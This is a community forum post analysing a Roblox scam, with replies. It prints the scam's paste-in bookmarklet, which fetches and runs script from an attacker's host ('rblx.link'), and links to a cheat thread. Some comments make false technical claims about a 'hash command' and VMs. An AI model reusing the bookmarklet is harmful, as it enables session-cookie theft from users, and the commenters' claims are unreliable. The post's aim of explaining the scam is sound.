Skip to content
← Back to Community
Getting revenge on a Roblox hacker
Profile icon
SixBeeps

(This post contains malicious JS code! Only run things if you absolutely know what it does!)

I was just browsing Roblox one day when I get the following message from a user I'd never seen before:

image

Already, I knew this was a scam of some sort. But, I followed the YT link out of curiosity. On there, it tells you to paste in something into the URL bar:

+javascript:$.get('//rblx.link:3000/1')

With my limited knowledge of JS, I managed to figure out what this code did.

  • javascript:: This stuff should be run as JS code
  • $.get: Using jQuery (I'm assuming) call an HTTP GET request
  • //rblx.link:3000/1: Some kind of link (this will be important)

So, it GETs some data from rblx.link and runs it as JS. But what is this link? I followed it, and all it did was show some code:

// Avatar Texture Downloader script // @WebGL3D // 2020-06-04 // Chain of requests that allows us to get the texture hash var hash = (await (await fetch((await (await fetch("https://www.roblox.com/avatar-thumbnail-3d/json?userId=" + $("meta[name='user-data']").data("userid"))).json()).Url)).json()).textures[0] // Calculate ID of CDN from hash for (var i = 31, t = 0; t < 32; t++) i ^= hash[t].charCodeAt(0); // Redirect to avatar texture url location.href = "https://t" + (i % 8).toString() + ".rbxcdn.com/" + hash

On its own, this doesn't look like anything malicious. However, it was revealed that somehow there was a cookie logger associated with the link. I'm not entirely sure how this logger works or where it is, but many people reported that after using this code, their accounts were hacked and replaced with Trump 2020 stuff. I'll admit, I had also found my account like this a week ago, but I never ran the code. Strange, innit?

Anyways, I wanted to get some harmless revenge on whoever did this. I decided to create something similar to the JS that was posted, but make it not track your cookies. I made the Repl below, then posted this comment on the video:

image

If you run my snippet (It's safe, don't worry!) you can see what it does for yourself :)
Just paste the contents below into the URL bar and remove the + sign. This must be done on a site, not on a new tab.

+javascript:location.href="//rbxavatar--sixbeeps.repl.co"

Voters
Profile icon
MRMANMRMAN2
Profile icon
SanjoeMonteras
Profile icon
jahangir323
Profile icon
OmN3xin
Profile icon
KarolinaKruszew
Profile icon
zhaq6129
Profile icon
ZeeMan
Profile icon
ETHANADSUNASHEA
Profile icon
TheForArkLD
Profile icon
Codemonkey51
Comments
hotnewtop
Profile icon
ETHANADSUNASHEA
Profile icon
SixBeeps
Profile icon
zhaq6129

@ETHANADSUNASHEA its a rick roll please learn meme culture

Profile icon
jUMPERTRIXIE

Bro what it just sends me to this https://www.youtube.com/watch?v=dQw4w9WgXcQ

Profile icon
SACHCHITMISHRA

it just say cant play video

Profile icon
KarimaKarima1

...

Profile icon
karenberys

It's incredible how easy it is these days to hack all items that have an internet connection. I, by the way, am also part of this Roblox aimbot ( https://guidedhacking.com/threads/lua-roblox-aimbot.17490/ ) study for personal use. A hacker is an excellent system programmer: he works at the system kernel or driver level, and the application programmers write user programs. I am constantly convinced of this. For hackers, the goal is more important than the money. And what they do is a game: if a hacker is not interested in or not comfortable doing something, he will not do it, and promises of "golden mountains" and "manna from heaven" do not work for them.

Profile icon
glasgonam

it's quite interesting! I have just started studying this topic, but I can already say that I really like it.

Profile icon
Jasperscode

dud you have no F*cking Idea what that thing does. I found a Minecraft hacked client that was proven to have a hidden backdoor and I know what it does.

Profile icon
Jasperscode

@Jasperscode That "scam" is using the HASH Command to give the "scammer" remote access to your computer via asking for the texture and then when the computer is getting the files it loads a virus that give the hacker full control over anything on the computer.

Profile icon
SixBeeps

@Jasperscode Uhh, the hash command is supposed to keep a hash table of programs and is only on Linux. How would it be used to access things on a Windows machine? And how would that GET request to the texture call that command?

Profile icon
Jasperscode

@SixBeeps the hash command will work on windows if the program is running

Profile icon
Jasperscode

@Jasperscode it is just less effective

Profile icon
SixBeeps

@Jasperscode Does it set up something like a VM? Is it some kind of weird port of the program? I don't see how a Unix command that is meant to run in a Unix ecosystem runs on something completely different like Windows.

Profile icon
Jasperscode

@SixBeeps More or less it makes some kind of proxy that connects the files through a VM yes

Profile icon
programmeruser

(sorry for necroposting) If you want to know more about this scam I found this blog post: https://petabyte.heb12.com/blog/?post=27

Profile icon
YPD

BEST. ROLL. EVER.

Profile icon
ZeeMan

Also, real haxxors could steal ur info

Profile icon
ZeeMan

Dont work for me

Profile icon
DynamicSquid

Damn, those ads really ruins it

Profile icon
SixBeeps

@DynamicSquid No kidding